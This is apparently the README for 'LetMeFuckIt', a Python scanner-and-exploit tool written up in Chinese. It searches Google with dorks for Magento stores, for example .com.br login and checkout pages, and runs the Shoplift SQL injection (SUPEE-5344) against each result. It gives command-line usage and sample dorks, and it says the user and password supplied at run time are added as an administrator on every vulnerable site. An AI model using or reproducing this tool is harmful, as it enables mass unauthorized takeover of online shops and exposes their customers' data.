Magento 扫描与利用工具
该扫描器用于探测 Magento 的 SQLi 漏洞(1.9.1.0 CE)。
该漏洞已在 补丁 SUPEE-5344 中修复,但扫描器可用于定位和测试未应用该安全补丁的系统。
LetMeFuckIt 使用 Python 编写,依赖以下库:
pygoogle, argparse, urllib2, requests, base64
letmefuckit.py --dork <dork> --pages <number> --user <user> --pwd <pass>
letmefuckit.py --dork "inurl:customer/account/login/ site:com.br" --pages 4 --user adm --pwd pass
--dork --user --pwd --pages --help
"inurl:/customer/account/login site:com.br"
"inurl:/checkout/onepage/ site:com.br"
通过输入的 dork 在 Google 中执行扫描,URL 会保存到 urls.txt 文件中,随后会自动逐个进行测试。
执行时提供的用户信息会自动作为管理员添加到存在漏洞的站点中。
如果遇到以下错误,是因为扫描器使用了 pygoogle 库,而该库已不兼容 Google 新的 API 系统(现在需要使用 API Key 才能调用)。
pygoogle ERROR __search__| responseDetails : Suspected Terms of Service Abuse. Please see http://code.google.com/apis/errors
如果出现此错误,只需等待 1 到 2 分钟,扫描器便会恢复正常。
漏洞利用:Magento Shoplift 漏洞利用 (SUPEE-5344) 由 Manish Kishan Tanwar (AKA error1046) 于 2015-08-25 发布
LetMeFuckIt Scanner AutoPwned 由 OntheFrontLine 于 2015-09-27 创建